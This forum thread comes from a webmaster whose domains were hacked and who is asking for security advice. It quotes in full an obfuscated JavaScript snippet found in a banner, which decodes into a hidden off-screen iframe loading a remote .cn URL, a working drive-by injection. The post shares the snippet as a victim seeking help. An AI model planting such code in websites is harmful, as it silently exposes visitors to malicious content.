Jump to content

HACKED!!

Mr_J

By Mr_J
in Miscellaneous

 Share

Recommended Posts

Mr_J Regular Member

Mr_J

Posted
Posted

My first time...  >:(

<?php
echo $_SERVER["SERVER_SOFTWARE"]
?>

==

Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0

 

Any security/config/what2do pointers?

 

I have a copy of the hackers files left on server. Only hacked 3/3 multiple domains and NOT the Primary domain  :wtf:

 

Link to comment
Share on other sites
Mr_J Regular Member

Mr_J

Posted
  • Author
Posted

 

I found this topic after being hacked: http://forums.tizag.com/showthread.php?t=13396

 

The following script found in the topic seems very much harmful or powerful and I have something similar found on some banner you add to your site. I took it off 'I hope' but I'm sure there is some Backdoor or key-logger still hidden somewhere.

<script type="text/javascript">
var main = "lAOY60lAOY105lAOY102lAOY114lAOY97lAOY109lAOY1 01lA OY32lAOY119lAOY105lAOY100lAOY116lAOY104lAOY61lAOY3 4lAOY52lAOY56lAOY48lAOY34lAOY32lAOY104lAOY101lAOY1 05lAOY103lAOY104lAOY116lAOY61lAOY34lAOY54lAOY48lAO Y34lAOY32lAOY115lAOY114lAOY99lAOY61lAOY34lAOY104lA OY116lAOY116lAOY112lAOY58lAOY47lAOY47lAOY116lAOY11 4lAOY97lAOY102lAOY102lAOY105lAOY99lAOY115lAOY45lAO Y105lAOY110lAOY115lAOY112lAOY101lAOY99lAOY116lAOY1 11lAOY114lAOY46lAOY99lAOY110lAOY47lAOY100lAOY97lAO Y105lAOY108lAOY121lAOY95lAOY115lAOY116lAOY97lAOY11 6lAOY115lAOY47lAOY105lAOY110lAOY46lAOY99lAOY103lAO Y105lAOY63lAOY52lAOY34lAOY32lAOY115lAOY116lAOY121l AOY108lAOY101lAOY61lAOY34lAOY98lAOY111lAOY114lAOY1 00lAOY101lAOY114lAOY58lAOY48lAOY112lAOY120lAOY59lA OY32lAOY112lAOY111lAOY115lAOY105lAOY116lAOY105lAOY 111lAOY110lAOY58lAOY114lAOY101lAOY108lAOY97lAOY116 lAOY105lAOY118lAOY101lAOY59lAOY32lAOY116lAOY111lAO Y112lAOY58lAOY48lAOY112lAOY120lAOY59lAOY32lAOY108l AOY101lAOY102lAOY116lAOY58lAOY45lAOY53lAOY48lAOY48 lAOY112lAOY120lAOY59lAOY32lAOY111lAOY112lAOY97lAOY 99lAOY105lAOY116lAOY121lAOY58lAOY48lAOY59lAOY32lAO Y102lAOY105lAOY108lAOY116lAOY101lAOY114lAOY58lAOY1 12lAOY114lAOY111lAOY103lAOY105lAOY100lAOY58lAOY68l AOY88lAOY73lAOY109lAOY97lAOY103lAOY101lAOY84lAOY11 4lAOY97lAOY110lAOY115lAOY102lAOY111lAOY114lAOY109l AOY46lAOY77lAOY105lAOY99lAOY114lAOY111lAOY115lAOY1 11lAOY102lAOY116lAOY46lAOY65lAOY108lAOY112lAOY104l AOY97lAOY40lAOY111lAOY112lAOY97lAOY99lAOY105lAOY11 6lAOY121lAOY61lAOY48lAOY41lAOY59lAOY32lAOY45lAOY10 9lAOY111lAOY122lAOY45lAOY111lAOY112lAOY97lAOY99lAO Y105lAOY116lAOY121lAOY58lAOY48lAOY34lAOY62lAOY60lA OY47lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lAOY6 2";
var split = main.split("lAOY");
var decode = "";
for (var i=1; i<split.length; i++){
decode += String.fromCharCode(split[i]);
}

var writer = ""+decode+"";
document.write(""+writer+"")
</script>

 

Anyone have a plan of action for me?

I'm considering to move hosting as they didn't even attempt to help me.

I'm very concerned about the fact and have no idea how they did it and worse how to stop it...

 

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.